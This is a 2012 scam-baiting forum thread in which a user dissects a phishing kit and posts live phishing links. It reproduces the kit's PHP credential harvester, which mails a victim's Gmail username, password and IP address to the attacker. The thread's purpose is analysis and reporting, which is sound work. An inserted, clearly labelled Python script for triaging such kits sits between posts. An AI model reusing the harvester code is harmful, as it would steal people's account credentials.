zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 101
Location: England
|
Posted:
Wed Jun 27, 2012 9:29 am |
|
If you open www.jasonsamuel.com only it seems to be a normal blog. However the link I received in a scam email opens a page, saying:
Quote: |
To access our online secured auction page,
you are required to choose your email address below |
Here is the link:
http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm
It is safe to open it; it asks you to select an email provider, so after clicking the relevant icon a small form appears prompting for email and password.
This is 100% fake and the purpose is to collect email/password information from innocent victims.
I made a quick analysis and was able to download a ZIP file, containing the files hosted behind the malicious link. There are PHP (server-side) files, executed when the user clicks the "Sign in" button. Here are the contents of one of the PHP files:
Quote: |
<?include 'index_files/validate_form.js';
$ip = getenv("REMOTE_ADDR");
$message .= "---------------- XxX *~* HollYd*~* XxX----------------------\n";
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$message .= "IP: ".$ip."\n";
$message .= "----------------------------------Created By HollyD--------------------------------------\n";
$recipient = "[email protected]";
$subject = "Gma!l REZ";
$headers .= "MIME-Version: 1.0\n";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{
header("Location: http://www.remax.com/");
}
else
{
echo "ERROR! Please go back and try again.";
}
?> |
I can clearly see this code is constructing a message, containing the email and password entered by the victim, also the client IP address and some other stupid lines ("Created By HollyD"). Then this message is sent to the following address:
[email protected]
If anybody else wants to take a look, open the following link (it is safe):
http://www.jasonsamuel.com/fitness/properties/
It will open the directory contents; download the properties.zip file. The code listed above I extracted from gmail.php - the other PHP files in fact perform exactly the same thing - sending the victim's email and password to this same email address:
[email protected]
What should be the course of action? |
_________________ x4 x 14
"Idiot you are such a moron, article of no commercial value uncircumcised baboon, moron of a frog"
"WHERE DID YOU LEARN THOSE CUT AND JOIN ENGLISH, WOW! IT SOUNDS VERY INTERESTING. CAN YOU MAKE A LINE OF GOOD GRAMMAR?"
"You email has been received and from my understanding your email is not well understood." |
|
|
|
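The manual review described in the post above (which form fields each PHP file collects, and which address it mails them to) can be automated when triaging a downloaded kit for an abuse report. This is an added Python example, not part of the original thread; the function names, the `drop@example.invalid` placeholder address and the `yahoo.php` contents are assumptions, and the sample is constructed to mirror the quoted `gmail.php`.

```python
import re

# Constructed sample modelled on the gmail.php quoted above. The drop address is
# a placeholder (the real one is redacted on the page); yahoo.php is hypothetical.
SAMPLE_KIT = {
    "gmail.php": r'''<?
$message .= "Gmail: ".$_POST['gmailuser']."\n";
$message .= "Password: ".$_POST['gmailpassword']."\n";
$recipient = "drop@example.invalid";
mail($recipient,$subject,$message,$headers);
if (mail($recipent,$subject,$message,$headers))
{ header("Location: http://www.remax.com/"); }
?>''',
    "yahoo.php": r'''<?
$message .= "Yahoo: ".$_POST['yahoouser']."\n";
$recipient = "drop@example.invalid";
mail($recipient,$subject,$message,$headers);
?>''',
}

POST_RE = re.compile(r"""\$_POST\[\s*['"]([^'"]+)['"]\s*\]""")
ASSIGN_RE = re.compile(r"""\$(\w+)\s*=\s*['"]([^'"\s]+@[^'"\s]+)['"]""")
MAIL_RE = re.compile(r"""\bmail\(\s*(\$\w+|['"][^'"]+['"])""")
REDIR_RE = re.compile(r"""header\(\s*['"]Location:\s*([^'"]+)['"]""")

def triage(files):
    """Per file: harvested fields, mail() destinations, unresolved args, redirects."""
    report = {}
    for name, src in files.items():
        literals = dict(ASSIGN_RE.findall(src))  # variable name -> address literal
        dests, unresolved = set(), set()
        for arg in MAIL_RE.findall(src):
            if not arg.startswith("$"):
                dests.add(arg.strip("'\""))       # address written inline
            elif arg[1:] in literals:
                dests.add(literals[arg[1:]])      # variable resolved to a literal
            else:
                unresolved.add(arg)               # e.g. a misspelled variable
        report[name] = {"fields": sorted(set(POST_RE.findall(src))),
                        "drop_addresses": sorted(dests),
                        "unresolved_mail_args": sorted(unresolved),
                        "redirects": REDIR_RE.findall(src)}
    return report

def common_drops(report):
    """Addresses that every file in the kit mails to."""
    sets = [set(r["drop_addresses"]) for r in report.values()]
    return sorted(set.intersection(*sets)) if sets else []

if __name__ == "__main__":
    print(triage(SAMPLE_KIT), common_drops(SAMPLE_KIT and triage(SAMPLE_KIT)))
```

The harvested field names, the shared drop address and the post-submit redirect are the details an email provider's abuse team can act on.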
B8er
Associate Boomdazzler
Joined: 16 Feb 2009
Posts: 13625
Location: In self-isolation practicing social distancing
|
Posted:
Wed Jun 27, 2012 10:57 am |
|
It's a phishing site, which we don't deal with here.
The best thing to do would be to report it to one (or more) of the email providers using their report phishing links - give them the http://www.jasonsamuel.com/fitness/properties/properties/properties/index.htm page so that they can see it is phishing for email passwords.
They will soon get it closed down. |
_________________ "I DENOUNCE THE MUFFIN MEN" - Ma Kim
"YOU ARE WALKING DEAD MAN. YOUR WOODEN COFFIN IS READY TO SWALLOW YOU AND YOUR DIRTY GENERATION"
"all chaps are ass-less by design otherwise they just be leather pants" - jose_cuervo
x 5
x 335 🚽
x 4 x 1746 x 1904 - Fake cheques: $4,392,620.83
Team Woody - Ghana to Singapore - 11535km |
|
|
|
zzz
Master Baiter
Joined: 14 Jun 2012
Posts: 101
Location: England
|
Posted:
Wed Jun 27, 2012 11:07 am |
|
^^^ Reported to Google.
Can a mod close this thread please? |
|
|
|
woody999
Baiting Guru
Joined: 30 May 2009
Posts: 20608
Location: East of Humptulips
|
Posted:
Wed Jun 27, 2012 1:02 pm |
|
Marking as n/a and can be moved offline |
_________________ "thank you for making me a fool" CC lad
"I lost my assories" Barr. Angus Bu...g
"YOU NEED SOME DOCTOR" Barrister Peter Paul
I dont know who is lieing ,either you or F3lcha1r
is annoying to watch my email for a whole day and not read from you-
>178 x 200 x2
Peru : sri lanka : USVI : Oman x 5816
x 45 x2 |
|
|
|